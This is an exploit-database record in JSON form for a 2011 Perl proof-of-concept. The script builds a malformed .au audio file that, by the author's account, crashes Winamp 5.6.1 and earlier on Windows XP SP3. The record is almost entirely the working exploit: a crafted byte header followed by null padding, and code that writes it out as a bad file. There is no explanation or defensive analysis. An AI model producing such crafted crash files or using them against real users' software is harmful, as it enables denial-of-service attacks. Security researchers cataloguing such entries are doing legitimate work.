Description
Exploit for windows platform in category dos / poc
{"id": "1337DAY-ID-15853", "type": "zdt", "bulletinFamily": "exploit", "title": "Winamp <=5.6.1 (.au) Denial of Service Exploit", "description": "Exploit for windows platform in category dos / poc", "published": "2011-04-15T00:00:00", "modified": "2011-04-15T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://0day.today/exploit/description/15853", "reporter": "KedAns-Dz", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2018-03-12T17:06:05", "viewCount": 6, "enchantments": {"score": {"value": 0.2, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.2}, "sourceHref": "https://0day.today/exploit/15853", "sourceData": "#!/usr/bin/perl\r\n# ---------\r\n# Winamp <=5.6.1 (.au) Denial of Service Exploit\r\n# Author : KedAns-Dz <[email\u00a0protected] || [email\u00a0protected]>\r\n# special thanks to : jos_ali_joe (exploit-id.com) , and All exploit-id Team\r\n# ---------\r\n# Tested in Windows XP sp3 Fr\r\n# Creating The Bad File .AU And Opening ...\r\n# The Winamp 5.6.1 is Run With Process (igfxsrvc.exe) and Overflow/Blocked !!\r\nmy $AU =\r\n\"\\x2E\\x73\\x6E\\x64\\x00\\x00\\x01\\x18\\x00\\x00\\x42\\xDC\\x00\\x00\\x00\\x01\".\r\n\"\\x00\\x00\\x1F\\x40\\x00\\x00\\x00\\x00\\x69\\x61\\x70\\x65\\x74\\x75\\x73\\x2E\". \r\n\"\\x61\\x75\\x00\\x20\\x22\\x69\\x61\\x70\\x65\\x74\\x75\\x73\\x2E\\x61\\x75\\x22\". \r\n\"\\x00\\x31\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\".\r\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\".\r\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\".\r\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\".\r\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\".\r\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\".\r\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\".\r\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\".\r\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\".\r\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\".\r\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\".\r\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\".\r\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\".\r\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\".\r\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x66\\x66\\x66\\x00\";\r\nopen (FILE,\">> KedAns.au\"); # Bad File Here\r\nprint FILE $AU;\r\nclose (FILE);\r\n# KedAns-Dz | [D] HaCkerS-StreeT-Team [Z] |!| http://twitter.com/kedans\r\n\r\n\n\n# 0day.today [2018-03-12] #", "_state": {"dependencies": 1646931184, "score": 1659766679, "epss": 1678812679}}
{}